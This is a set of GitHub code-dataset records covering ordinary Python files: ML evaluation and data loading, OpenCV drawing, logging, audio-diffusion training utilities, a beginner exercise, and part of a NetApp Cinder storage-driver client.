metrics.f1_score(y_test, X_test_pred, average='weighted')\r\n\r\n # wilson score\r\n wilson_score_low, wilson_score_high = wilsonscore(\r\n test_mean_f1, y_test.shape[0])\r\n print ('train: mean_f1: {:.4} | weighted_f1: {:.4}'.format(\r\n train_mean_f1, train_weighted_f1))\r\n print ('val: mean_f1: {:.4} | weighted_f1: {:.4}'.format(\r\n val_mean_f1, val_weighted_f1))\r\n print ('test: mean_f1: {:.4} | weighted_f1: {:.4}'.format(\r\n test_mean_f1, test_weighted_f1))\r\n print ('wilson score | low: {:.4} | high: {:.4}'.format(wilson_score_low, wilson_score_high))","repo_name":"hyeokhyen/sat","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"23551091491","text":"class TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass ListNode:\n def __init__(self, x) :\n if type(x) is list:\n ptr = dummyHead = ListNode(0)\n for val in x:\n ptr.next = ListNode(val)\n ptr = ptr.next\n self.val = dummyHead.next.val\n self.next = dummyHead.next.next\n else:\n self.val = x\n self.next = None ","repo_name":"guangyw/leetcode_python","sub_path":"Utils.py","file_name":"Utils.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4415558595","text":"import torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nfrom torchvision import transforms\nimport os\nimport cv2\nimport pdb\nfrom onehot import onehot\nimport torch\n\ntransform = transforms.Compose([transforms.ToTensor(), transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\nclass BagDataset(Dataset):\n\n def __init__(self, transform=None):\n self.transform = transform \n def __len__(self):\n return len(os.listdir('last'))\n\n def __getitem__(self, idx):\n img_name = os.listdir('last')[idx]\n imgA = cv2.imread('last/'+img_name)\n imgA = cv2.resize(imgA, (160, 160))\n imgB = cv2.imread('last_msk/'+img_name, 0)\n imgB = cv2.resize(imgB, (160, 160))\n imgB = imgB/255\n imgB = imgB.astype('uint8')\n imgB = onehot(imgB, 2)\n imgB = imgB.swapaxes(0, 2).swapaxes(1, 2)\n imgB = torch.FloatTensor(imgB)\n #print(imgB.shape)\n if self.transform:\n imgA = self.transform(imgA) \n item = {'A':imgA, 'B':imgB}\n return item\n\nbag = BagDataset(transform)\ndataloader = DataLoader(bag, batch_size=4, shuffle=True, num_workers=4)\nif __name__ =='__main__':\n for batch in dataloader:\n break\n\n\n\n\n\n\n","repo_name":"yunlongdong/FCN-pytorch","sub_path":"BagData.py","file_name":"BagData.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"66"} +{"seq_id":"74232339731","text":"import cv2\r\nimport numpy as np\r\n# Create blank images for each shape\r\nline_image = np.zeros((400, 400, 3), dtype=np.uint8)\r\nrectangle_image = np.zeros((400, 400, 3), dtype=np.uint8)\r\nellipse_image = np.zeros((400, 400, 3), dtype=np.uint8)\r\ncircle_image = np.zeros((400, 400, 3), dtype=np.uint8)\r\n\r\n# Draw a line\r\ncv2.line(line_image, (50, 50), (350, 50), (0, 0, 255), 2)\r\n# Draw a rectangle\r\ncv2.rectangle(rectangle_image, (100, 100), (300, 300), (0, 255, 0), 2)\r\n# Draw an ellipse\r\ncv2.ellipse(ellipse_image, (200, 200), (100, 50), 0, 0, 360, (255, 0, 0), 2)\r\n# Draw a circle\r\ncv2.circle(circle_image, (200, 200), 50, (255, 255, 255), -1) # -1 for filled circle\r\n\r\n# 
Display the images one at a time\r\ncv2.imshow(\"Line\", line_image)\r\ncv2.waitKey(1000) # Display for 1 second (1000 milliseconds)\r\ncv2.imshow(\"Rectangle\", rectangle_image)\r\ncv2.waitKey(1000)\r\ncv2.imshow(\"Ellipse\", ellipse_image)\r\ncv2.waitKey(1000)\r\ncv2.imshow(\"Circle\", circle_image)\r\n# Wait for a key press and close all windows when any key is pressed\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()\r\n","repo_name":"Tharunraj-s/controlone.ai","sub_path":"DrawFig/draw_fig.py","file_name":"draw_fig.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5376563865","text":"import numpy as np\nimport copy\n\ndef make_batch_masks(data_index, batch_size=None, n_batch=None, random_state=0,\n                     residue='ignore', shuffle=True):\n    \"\"\"\n    Make a list of batch_masks which splits train data into batches\n\n    Parameters\n    ----------\n    data_index: array_like or set of int\n        Indices of data to split into batches.\n    batch_size: int or None\n        Number of data points in each batch\n    n_batch: int or None\n        Number of batches\n        Ignored when batch_size is specified.\n    residue: str\n        How to treat residues of batches (i.e. n_data%batch_size or n_data%n_batch)\n        'ignore': Do not assign any batch to residues\n        'new': residues form a new batch\n        'include': residues are distributed among the existing batches\n    shuffle: bool\n        If True, data are batched randomly.\n        If False, data are batched in order of data_index\n    random_state: int\n        Seed of the RNG which assigns data to batches\n\n    Returns\n    -------\n    batch_masks: list of np.ndarray(batch_size) of int\n        list of indices of data included in each batch.\n        batch_size may vary among batch_masks due to residues.\n\n    Notes\n    -----\n    Specify at least one of batch_size and n_batch.\n    \"\"\"\n    data_index = copy.deepcopy(data_index)\n    assert (batch_size is not None) or (n_batch is not None)\n    n_data = len(data_index)\n    rstate = np.random.RandomState(random_state)\n    if residue == 'ignore':\n        if batch_size is not None:\n            n_batch = n_data // batch_size\n        n_datas_batch = np.full(n_batch, fill_value=batch_size)\n    elif residue == 'include':\n        if 0 < n_data < batch_size:\n            n_datas_batch = [n_data]\n        else:\n            if batch_size is not None:\n                n_batch = n_data // batch_size\n            n_datas_batch = []\n            for i in range(n_batch):\n                n_datas_batch.append((n_data-sum(n_datas_batch)) // (n_batch-i))\n    elif residue == 'new':\n        if batch_size is not None:\n            n_batch = n_data // batch_size\n        n_datas_batch = list(np.full(n_batch, fill_value=batch_size))\n        res = n_data - n_batch*batch_size \n        if res > 0:\n            n_datas_batch.append(res)\n    else:\n        raise ValueError(f\"Unsupported type of handling residue: {residue}\")\n\n    data_index = np.array(data_index)\n    if shuffle:\n        rstate.shuffle(data_index)\n    n_batch = len(n_datas_batch)\n    batch_masks = []\n    for n_data_batch in n_datas_batch:\n        batch_masks.append(data_index[:n_data_batch])\n        data_index = data_index[n_data_batch:]\n    return batch_masks\n\n","repo_name":"mizuno-group/ChiralityMisunderstanding","sub_path":"src/data/batch.py","file_name":"batch.py","file_ext":"py","file_size_in_byte":2630,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"16203173644","text":"import tensorflow as tf\nimport logging\n\nclass Logger(object):\n    \"\"\"Tensorboard logger.\"\"\"\n\n    def __init__(self, log_dir):\n        \"\"\"Initialize summary writer.\"\"\"\n        self.writer = tf.summary.FileWriter(log_dir)\n\n    def scalar_summary(self, tag, value, step):\n
\"\"\"Add scalar summary.\"\"\"\n summary = tf.Summary(value=[tf.Summary.Value(tag=tag, simple_value=value)])\n self.writer.add_summary(summary, step)\n\n\nclass EventLogger:\n def __init__(self, name, out_path):\n \"\"\"Event logger to print the event to console and save it to file.\n \n Args:\n name: name of the logger\n out_path: complete path to save the file\n \"\"\"\n # Create a custom logger\n self.logger = logging.getLogger(name)\n self.logger.setLevel(logging.INFO)\n\n # Create handlers\n file_hdl = logging.FileHandler(out_path)\n console_hdl = logging.StreamHandler()\n\n # Create formatters and add it to handlers\n formatter = logging.Formatter(\n '[%(asctime)s] %(message)s', datefmt='%d-%b-%y %H:%M:%S'\n )\n file_hdl.setFormatter(formatter)\n console_hdl.setFormatter(formatter)\n\n # Add handlers to the logger\n self.logger.addHandler(file_hdl)\n self.logger.addHandler(console_hdl)\n \n def log(self, message):\n \"\"\"Log the message (str)\"\"\"\n self.logger.info(message)","repo_name":"Ziyu0/max-sliced-stargan","sub_path":"logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"66"} +{"seq_id":"4784516379","text":"# Make a program that reads the year of birth of a young person and reports, according to their age:\n# If he is still going to enlist in the military; If it's time to enlist; If you are past the time of enlistment.\n# Your program should also show how much time is left or past the deadline.\n\nfrom datetime import date\n\nbirth = int(input('Enter your year of birth: '))\nyear = date.today().year\nage = year - birth\nprint('Whoever was born in {} is {} years ond in {}'.format(birth, age, year))\nif age < 18:\n s = 18 - age\n print('Enlistment is still {} years away. \\nYour enlistment will be in {}.'.format(s, year + s))\nelif age > 18:\n s = age - 18\n print('You should have signed up {} years ago. \\nYour enlistment was in {}'.format(s, year - s))\nelse:\n print('You have to enlist IMMEDIATELY.')\n","repo_name":"MCLeitao/Python-Exercises","sub_path":"download-package/PythonExercises/ex039.py","file_name":"ex039.py","file_ext":"py","file_size_in_byte":806,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"12913839026","text":"\nimport torch\nimport torchaudio\nimport numpy as np\nimport scipy.signal\nclass EMAWarmup:\n \"\"\"Implements an EMA warmup using an inverse decay schedule.\n If inv_gamma=1 and power=1, implements a simple average. inv_gamma=1, power=2/3 are\n good values for models you plan to train for a million or more steps (reaches decay\n factor 0.999 at 31.6K steps, 0.9999 at 1M steps), inv_gamma=1, power=3/4 for models\n you plan to train for less (reaches decay factor 0.999 at 10K steps, 0.9999 at\n 215.4k steps).\n Args:\n inv_gamma (float): Inverse multiplicative factor of EMA warmup. Default: 1.\n power (float): Exponential factor of EMA warmup. Default: 1.\n min_value (float): The minimum EMA decay rate. Default: 0.\n max_value (float): The maximum EMA decay rate. Default: 1.\n start_at (int): The epoch to start averaging at. Default: 0.\n last_epoch (int): The index of last epoch. 
\n\n#from https://github.com/csteinmetz1/auraloss/blob/main/auraloss/perceptual.py\nclass FIRFilter(torch.nn.Module):\n    \"\"\"FIR pre-emphasis filtering module.\n    Args:\n        filter_type (str): Shape of the desired FIR filter (\"hp\", \"fd\", \"aw\"). Default: \"hp\"\n        coef (float): Coefficient value for the filter tap (only applicable for \"hp\" and \"fd\"). Default: 0.85\n        ntaps (int): Number of FIR filter taps for constructing A-weighting filters. Default: 101\n        plot (bool): Plot the magnitude response of the filter. Default: False\n    Based upon the perceptual loss pre-emphasis filters proposed by\n    [Wright & Välimäki, 2019](https://arxiv.org/abs/1911.08922).\n    A-weighting filter - \"aw\"\n    First-order highpass - \"hp\"\n    Folded differentiator - \"fd\"\n    Note that the default coefficient value of 0.85 is optimized for\n    a sampling rate of 44.1 kHz; consider adjusting this value at different sampling rates.\n    \"\"\"\n\n    def __init__(self, filter_type=\"hp\", coef=0.85, fs=44100, ntaps=101, plot=False): \n        \"\"\"Initialize FIR pre-emphasis filtering module.\"\"\"\n        super(FIRFilter, self).__init__()\n        self.filter_type = filter_type\n        self.coef = coef\n        self.fs = fs\n        self.ntaps = ntaps\n        self.plot = plot\n\n        if ntaps % 2 == 0:\n            raise ValueError(f\"ntaps must be odd (ntaps={ntaps}).\")\n\n        if filter_type == \"hp\":\n            self.fir = torch.nn.Conv1d(1, 1, kernel_size=3, bias=False, padding=1)\n            self.fir.weight.requires_grad = False\n            self.fir.weight.data = torch.tensor([1, -coef, 0]).view(1, 1, -1)\n        elif filter_type == \"fd\":\n            self.fir = torch.nn.Conv1d(1, 1, kernel_size=3, bias=False, padding=1)\n            self.fir.weight.requires_grad = False\n            self.fir.weight.data = torch.tensor([1, 0, -coef]).view(1, 1, -1)\n        elif filter_type == \"aw\":\n            # Definition of analog A-weighting filter according to IEC/CD 1672.\n            f1 = 20.598997\n            f2 = 107.65265\n            f3 = 737.86223\n            f4 = 12194.217\n            A1000 = 1.9997\n\n            NUMs = [(2 * np.pi * f4) ** 2 * (10 ** (A1000 / 20)), 0, 0, 0, 0]\n            DENs = np.polymul(\n                [1, 4 * np.pi * f4, (2 * np.pi * f4) ** 2],\n                [1, 4 * np.pi * f1, (2 * np.pi * f1) ** 2],\n            )\n            DENs = np.polymul(\n                np.polymul(DENs, [1, 2 * np.pi * f3]), [1, 2 * np.pi * f2]\n            )\n\n            # convert analog filter to digital filter\n            b, a = scipy.signal.bilinear(NUMs, DENs, fs=fs)\n\n            # compute the digital filter frequency response\n            w_iir, h_iir = scipy.signal.freqz(b, a, worN=512, fs=fs)\n\n            # then we fit to 101 tap FIR filter with least squares\n            taps = scipy.signal.firls(ntaps, w_iir, abs(h_iir), fs=fs)\n\n            # now implement this digital FIR filter as a Conv1d layer\n            self.fir = torch.nn.Conv1d(\n                1, 1, kernel_size=ntaps, bias=False, padding=ntaps // 2\n            )\n            self.fir.weight.requires_grad = False\n            self.fir.weight.data = torch.tensor(taps.astype(\"float32\")).view(1, 1, -1)\n\n    def forward(self, error):\n        \"\"\"Calculate forward propagation.\n        Args:\n            error (Tensor): Signal to filter (B, #samples).\n        Returns:\n            Tensor: Filtered signal of the same shape.\n        \"\"\"\n        self.fir.weight.data=self.fir.weight.data.to(error.device)\n        error=error.unsqueeze(1)\n        error = torch.nn.functional.conv1d(\n            error, self.fir.weight.data, padding=self.ntaps // 2\n        )\n        error=error.squeeze(1)\n        return error\n\ndef resample_batch(audio, fs, fs_target, length_target):\n\n    device=audio.device\n    dtype=audio.dtype\n    B=audio.shape[0]\n    # if possible, resample in a batched way\n    # check if all the fs are the same and equal to 44100\n    if fs_target==22050:\n        if (fs==44100).all():\n            audio=torchaudio.functional.resample(audio, 2,1)\n            return audio[:, 0:length_target] # throw away the last samples\n        elif (fs==48000).all():\n            # approximate resampling\n            audio=torchaudio.functional.resample(audio, 160*2,147)\n            return audio[:, 0:length_target]\n        else:\n            # if the batch mixes 44100 and 48000 examples, the batched path fails, so just iterate over the batch\n            proc_batch=torch.zeros((B,length_target), device=device)\n            for i, (a, f_s) in enumerate(zip(audio, fs)): # hopefully this loop does not slow everything down\n                if f_s==44100:\n                    # resample by 2\n                    a=torchaudio.functional.resample(a, 2,1)\n                elif f_s==48000:\n                    a=torchaudio.functional.resample(a, 160*2,147)\n                else:\n                    print(\"WARNING, strange fs\", f_s)\n        \n                proc_batch[i]=a[0:length_target]\n            return proc_batch\n    elif fs_target==44100:\n        if (fs==44100).all():\n            return audio[:, 0:length_target] # throw away the last samples\n        elif (fs==48000).all():\n            # approximate resampling\n            audio=torchaudio.functional.resample(audio, 160,147)\n            return audio[:, 0:length_target]\n        else:\n            # if the batch mixes 44100 and 48000 examples, the batched path fails, so just iterate over the batch\n            proc_batch=torch.zeros((B,length_target), device=device)\n            for i, (a, f_s) in enumerate(zip(audio, fs)): # hopefully this loop does not slow everything down\n                if f_s==44100:\n                    # already at the target rate\n                    pass\n                elif f_s==48000:\n                    a=torchaudio.functional.resample(a, 160,147)\n                else:\n                    print(\"WARNING, strange fs\", f_s)\n        \n                proc_batch[i]=a[0:length_target] \n            return proc_batch\n    else:\n        print(\" resampling to fs_target\", fs_target)\n        if (fs==44100).all():\n            audio=torchaudio.functional.resample(audio, 44100, fs_target)\n            return audio[:, 0:length_target] # throw away the last samples\n        elif (fs==48000).all():\n            # approximate resampling\n            audio=torchaudio.functional.resample(audio, 48000,fs_target)\n            return audio[:, 0:length_target]\n        else:\n            # if the batch mixes 44100 and 48000 examples, the batched path fails, so just iterate over the batch\n            proc_batch=torch.zeros((B,length_target), device=device)\n            for i, (a, f_s) in enumerate(zip(audio, fs)): # hopefully this loop does not slow everything down\n                if f_s==44100:\n                    a=torchaudio.functional.resample(a, 44100,fs_target)\n                elif f_s==48000:\n                    a=torchaudio.functional.resample(a, 48000,fs_target)\n                else:\n                    print(\"WARNING, strange fs\", f_s)\n        \n                proc_batch[i]=a[0:length_target] \n            return proc_batch\n
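\n# Hypothetical usage sketch (added for illustration, not part of the original file):\n# apply the A-weighting pre-emphasis to a batch of error signals of shape (B, T)\n# before computing a loss. pred and target are assumed tensors, not defined here.\n#\n#   fir = FIRFilter(filter_type=\"aw\", fs=44100)\n#   weighted_error = fir(pred - target)  # stays (B, T), now A-weighted\n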
\ndef load_state_dict( state_dict, network=None, ema=None, optimizer=None, log=True):\n    '''\n    utility for loading state dicts for different models. This function sequentially tries different strategies.\n    args:\n        state_dict: the state dict to load\n    returns:\n        True if the state dict was loaded, False otherwise\n    Assuming the operations are done in place, this function should not create a copy of the network and optimizer.\n    '''\n    #print(state_dict)\n    if log: print(\"Loading state dict\")\n    if log:\n        print(state_dict.keys())\n    try:\n        if log: print(\"Attempt 1: trying with strict=True\")\n        if network is not None:\n            network.load_state_dict(state_dict['network'])\n        if optimizer is not None:\n            optimizer.load_state_dict(state_dict['optimizer'])\n        if ema is not None:\n            ema.load_state_dict(state_dict['ema'])\n        return True\n    except Exception as e:\n        if log:\n            print(\"Could not load state dict\")\n            print(e)\n    try:\n        if log: print(\"Attempt 2: trying with strict=False\")\n        if network is not None:\n            network.load_state_dict(state_dict['network'], strict=False)\n        #we cannot load the optimizer in this setting\n        #self.optimizer.load_state_dict(state_dict['optimizer'], strict=False)\n        if ema is not None:\n            ema.load_state_dict(state_dict['ema'], strict=False)\n        return True\n    except Exception as e:\n        if log:\n            print(\"Could not load state dict\")\n            print(e)\n            print(\"training from scratch\")\n    try:\n        if log: print(\"Attempt 3: trying with strict=False, but making sure that the shapes are fine\")\n        if ema is not None:\n            ema_state_dict = ema.state_dict()\n        if network is not None:\n            network_state_dict = network.state_dict()\n        i=0 \n        if network is not None:\n            for name, param in state_dict['network'].items():\n                if log: print(\"checking\",name) \n                if name in network_state_dict.keys():\n                    if network_state_dict[name].shape==param.shape:\n                        network_state_dict[name]=param\n                        if log:\n                            print(\"assigning\",name)\n                        i+=1\n            network.load_state_dict(network_state_dict)\n        if ema is not None:\n            for name, param in state_dict['ema'].items():\n                if log: print(\"checking\",name) \n                if name in ema_state_dict.keys():\n                    if ema_state_dict[name].shape==param.shape:\n                        ema_state_dict[name]=param\n                        if log:\n                            print(\"assigning\",name)\n                        i+=1\n        \n            ema.load_state_dict(ema_state_dict)\n        \n        if i==0:\n            if log: print(\"WARNING, no parameters were loaded\")\n            raise Exception(\"No parameters were loaded\")\n        elif i>0:\n            if log: print(\"loaded\", i, \"parameters\")\n            return True\n\n    except Exception as e:\n        print(e)\n        print(\"the second strict=False attempt failed\")\n\n\n    try:\n        if log: print(\"Attempt 4: Assuming the naming is different, with the network and ema called 'state_dict'\")\n        if network is not None:\n            network.load_state_dict(state_dict['state_dict'])\n        if ema is not None:\n            ema.load_state_dict(state_dict['state_dict'])\n    except Exception as e:\n        if log:\n            print(\"Could not load state dict\")\n            print(e)\n            print(\"training from scratch\")\n            print(\"It failed 3 times!! but not giving up\")\n    #print the names of the parameters in self.network\n\n    try:\n        if log: print(\"Attempt 5: trying to load with different names, now model='model' and ema='ema_weights'\")\n        if ema is not None:\n            dic_ema = {}\n            for (key, tensor) in zip(state_dict['model'].keys(), state_dict['ema_weights']):\n                dic_ema[key] = tensor\n            ema.load_state_dict(dic_ema)\n        return True\n    except Exception as e:\n        if log:\n            print(e)\n\n    try:\n        if log: print(\"Attempt 6: If there is something wrong with the names of the ema parameters, we can try to load them using the names of the parameters in the model\")\n        if ema is not None:\n            dic_ema = {}\n            i=0\n            for (key, tensor) in zip(state_dict['model'].keys(), state_dict['model'].values()):\n                if tensor.requires_grad:\n                    dic_ema[key]=state_dict['ema_weights'][i]\n                    i=i+1\n                else:\n                    dic_ema[key]=tensor \n            ema.load_state_dict(dic_ema)\n        return True\n    except Exception as e:\n        if log:\n            print(e)\n\n    #try:\n    #assign the parameters in state_dict to the network using a for loop\n    print(\"Attempt 7: Trying to load the parameters one by one. This is for the dance diffusion model, looking for parameters starting with 'diffusion.' or 'diffusion_ema.'\")\n    if ema is not None:\n        ema_state_dict = ema.state_dict()\n    if network is not None:\n        network_state_dict = network.state_dict()\n    i=0 \n    if network is not None:\n        for name, param in state_dict['state_dict'].items():\n            print(\"checking\",name) \n            if name.startswith(\"diffusion.\"):\n                i+=1\n                name=name.replace(\"diffusion.\",\"\")\n                if network_state_dict[name].shape==param.shape:\n                    #print(param.shape, network.state_dict()[name].shape)\n                    network_state_dict[name]=param\n                    #print(\"assigning\",name)\n\n        network.load_state_dict(network_state_dict, strict=False)\n\n    if ema is not None:\n        for name, param in state_dict['state_dict'].items():\n            if name.startswith(\"diffusion_ema.\"): \n                i+=1\n                name=name.replace(\"diffusion_ema.\",\"\")\n                if ema_state_dict[name].shape==param.shape:\n                    if log:\n                        print(param.shape, ema.state_dict()[name].shape)\n                    ema_state_dict[name]=param\n\n        ema.load_state_dict(ema_state_dict, strict=False)\n\n    if i==0:\n        print(\"WARNING, no parameters were loaded\")\n        raise Exception(\"No parameters were loaded\")\n    elif i>0:\n        print(\"loaded\", i, \"parameters\")\n        return True\n    #except Exception as e:\n    #    if log:\n    #        print(e)\n\n    return False\n\n    \n","repo_name":"eloimoliner/audio-inpainting-diffusion","sub_path":"utils/training_utils.py","file_name":"training_utils.py","file_ext":"py","file_size_in_byte":16836,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"66"} +{"seq_id":"9583167105","text":"import sys\n\nfrom oslo_log import log as logging\nfrom oslo_utils import excutils\nimport six\n\nfrom cinder import exception\nfrom cinder.i18n import _\nfrom cinder import utils\nfrom cinder.volume.drivers.netapp.dataontap.client import api as netapp_api\nfrom cinder.volume.drivers.netapp import utils as na_utils\nfrom cinder.volume import volume_utils\n\nLOG = logging.getLogger(__name__)\n\nDELETED_PREFIX = 'deleted_cinder_'\nMAX_SIZE_FOR_A_LUN = '17555678822400'\n\n\n@six.add_metaclass(volume_utils.TraceWrapperMetaclass)\nclass Client(object):\n\n    def __init__(self, **kwargs):\n        host = kwargs['hostname']\n        username = kwargs['username']\n        password = kwargs['password']\n        api_trace_pattern = kwargs['api_trace_pattern']\n        self.connection = netapp_api.NaServer(\n            host=host,\n            transport_type=kwargs['transport_type'],\n            port=kwargs['port'],\n            username=username,\n            password=password,\n
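            # the api_trace_pattern value controls which NetApp API calls are logged for tracing (descriptive note)\n            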
api_trace_pattern=api_trace_pattern)\n\n self.ssh_client = self._init_ssh_client(host, username, password)\n\n def _init_ssh_client(self, host, username, password):\n return netapp_api.SSHUtil(\n host=host,\n username=username,\n password=password)\n\n def _init_features(self):\n \"\"\"Set up the repository of available Data ONTAP features.\"\"\"\n self.features = na_utils.Features()\n\n def get_ontap_version(self, cached=True):\n \"\"\"Gets the ONTAP version-string and version-tuple\"\"\"\n\n if cached:\n return self.connection.get_ontap_version()\n\n ontap_version = netapp_api.NaElement(\"system-get-version\")\n result = self.connection.invoke_successfully(\n ontap_version, enable_tunneling=True)\n\n version_tuple = result.get_child_by_name(\n 'version-tuple') or netapp_api.NaElement('none')\n ontap_version_tuple = version_tuple.get_child_by_name(\n 'system-version-tuple') or netapp_api.NaElement('none')\n\n version = (\n int(ontap_version_tuple.get_child_content('generation')),\n int(ontap_version_tuple.get_child_content('major')),\n int(ontap_version_tuple.get_child_content('minor')))\n\n return version\n\n def get_ontapi_version(self, cached=True):\n \"\"\"Gets the supported ontapi version.\"\"\"\n\n if cached:\n return self.connection.get_api_version()\n\n ontapi_version = netapp_api.NaElement('system-get-ontapi-version')\n res = self.connection.invoke_successfully(ontapi_version, False)\n major = res.get_child_content('major-version')\n minor = res.get_child_content('minor-version')\n return major, minor\n\n def _strip_xml_namespace(self, string):\n if string.startswith('{') and '}' in string:\n return string.split('}', 1)[1]\n return string\n\n def check_is_naelement(self, elem):\n \"\"\"Checks if object is instance of NaElement.\"\"\"\n if not isinstance(elem, netapp_api.NaElement):\n raise ValueError('Expects NaElement')\n\n def create_lun(self, volume_name, lun_name, size, metadata,\n qos_policy_group_name=None,\n qos_policy_group_is_adaptive=False):\n \"\"\"Issues API request for creating LUN on volume.\"\"\"\n self._validate_qos_policy_group(qos_policy_group_is_adaptive)\n\n path = '/vol/%s/%s' % (volume_name, lun_name)\n space_reservation = metadata['SpaceReserved']\n initial_size = size\n ontap_version = self.get_ontap_version()\n\n # On older ONTAP versions the extend size is limited to its\n # geometry on max_resize_size. In order to remove this\n # limitation we create the LUN with its maximum possible size\n # and then shrink to the requested size.\n if ontap_version < (9, 5, 0):\n initial_size = MAX_SIZE_FOR_A_LUN\n # In order to create a LUN with its maximum size (16TB),\n # the space_reservation needs to be disabled\n space_reservation = 'false'\n\n params = {'path': path, 'size': str(initial_size),\n 'ostype': metadata['OsType'],\n 'space-reservation-enabled': space_reservation}\n version = self.get_ontapi_version()\n if version >= (1, 110):\n params['use-exact-size'] = 'true'\n lun_create = netapp_api.NaElement.create_node_with_children(\n 'lun-create-by-size',\n **params)\n if qos_policy_group_name:\n if qos_policy_group_is_adaptive:\n lun_create.add_new_child(\n 'qos-adaptive-policy-group', qos_policy_group_name)\n else:\n lun_create.add_new_child(\n 'qos-policy-group', qos_policy_group_name)\n\n try:\n self.connection.invoke_successfully(lun_create, True)\n except netapp_api.NaApiError as ex:\n with excutils.save_and_reraise_exception():\n LOG.error(\"Error provisioning volume %(lun_name)s on \"\n \"%(volume_name)s. 
Details: %(ex)s\",\n {'lun_name': lun_name,\n 'volume_name': volume_name,\n 'ex': ex})\n\n if ontap_version < (9, 5, 0):\n self.do_direct_resize(path, six.text_type(size))\n if metadata['SpaceReserved'] == 'true':\n self.set_lun_space_reservation(path, True)\n\n def set_lun_space_reservation(self, path, flag):\n \"\"\"Sets the LUN space reservation on ONTAP.\"\"\"\n\n lun_modify_space_reservation = (\n netapp_api.NaElement.create_node_with_children(\n 'lun-set-space-reservation-info', **{\n 'path': path,\n 'enable': str(flag)}))\n self.connection.invoke_successfully(lun_modify_space_reservation, True)\n\n def destroy_lun(self, path, force=True):\n \"\"\"Destroys the LUN at the path.\"\"\"\n lun_destroy = netapp_api.NaElement.create_node_with_children(\n 'lun-destroy',\n **{'path': path})\n if force:\n lun_destroy.add_new_child('force', 'true')\n self.connection.invoke_successfully(lun_destroy, True)\n seg = path.split(\"/\")\n LOG.debug(\"Destroyed LUN %s\", seg[-1])\n\n def map_lun(self, path, igroup_name, lun_id=None):\n \"\"\"Maps LUN to the initiator and returns LUN id assigned.\"\"\"\n lun_map = netapp_api.NaElement.create_node_with_children(\n 'lun-map', **{'path': path,\n 'initiator-group': igroup_name})\n if lun_id:\n lun_map.add_new_child('lun-id', lun_id)\n try:\n result = self.connection.invoke_successfully(lun_map, True)\n return result.get_child_content('lun-id-assigned')\n except netapp_api.NaApiError as e:\n code = e.code\n message = e.message\n LOG.warning('Error mapping LUN. Code :%(code)s, Message: '\n '%(message)s', {'code': code, 'message': message})\n raise\n\n def unmap_lun(self, path, igroup_name):\n \"\"\"Unmaps a LUN from given initiator.\"\"\"\n lun_unmap = netapp_api.NaElement.create_node_with_children(\n 'lun-unmap',\n **{'path': path, 'initiator-group': igroup_name})\n try:\n self.connection.invoke_successfully(lun_unmap, True)\n except netapp_api.NaApiError as e:\n exc_info = sys.exc_info()\n LOG.warning(\"Error unmapping LUN. 
Code :%(code)s, Message: \"\n \"%(message)s\", {'code': e.code,\n 'message': e.message})\n # if the LUN is already unmapped\n if e.code == '13115' or e.code == '9016':\n pass\n else:\n six.reraise(*exc_info)\n\n def create_igroup(self, igroup, igroup_type='iscsi', os_type='default'):\n \"\"\"Creates igroup with specified args.\"\"\"\n igroup_create = netapp_api.NaElement.create_node_with_children(\n 'igroup-create',\n **{'initiator-group-name': igroup,\n 'initiator-group-type': igroup_type,\n 'os-type': os_type})\n self.connection.invoke_successfully(igroup_create, True)\n\n def add_igroup_initiator(self, igroup, initiator):\n \"\"\"Adds initiators to the specified igroup.\"\"\"\n igroup_add = netapp_api.NaElement.create_node_with_children(\n 'igroup-add',\n **{'initiator-group-name': igroup,\n 'initiator': initiator})\n self.connection.invoke_successfully(igroup_add, True)\n\n def do_direct_resize(self, path, new_size_bytes, force=True):\n \"\"\"Resize the LUN.\"\"\"\n seg = path.split(\"/\")\n LOG.info(\"Resizing LUN %s directly to new size.\", seg[-1])\n lun_resize = netapp_api.NaElement.create_node_with_children(\n 'lun-resize',\n **{'path': path,\n 'size': new_size_bytes})\n if force:\n lun_resize.add_new_child('force', 'true')\n self.connection.invoke_successfully(lun_resize, True)\n\n def get_lun_geometry(self, path):\n \"\"\"Gets the LUN geometry.\"\"\"\n geometry = {}\n lun_geo = netapp_api.NaElement(\"lun-get-geometry\")\n lun_geo.add_new_child('path', path)\n try:\n result = self.connection.invoke_successfully(lun_geo, True)\n geometry['size'] = result.get_child_content(\"size\")\n geometry['bytes_per_sector'] = result.get_child_content(\n \"bytes-per-sector\")\n geometry['sectors_per_track'] = result.get_child_content(\n \"sectors-per-track\")\n geometry['tracks_per_cylinder'] = result.get_child_content(\n \"tracks-per-cylinder\")\n geometry['cylinders'] = result.get_child_content(\"cylinders\")\n geometry['max_resize'] = result.get_child_content(\n \"max-resize-size\")\n except Exception as e:\n LOG.error(\"LUN %(path)s geometry failed. 
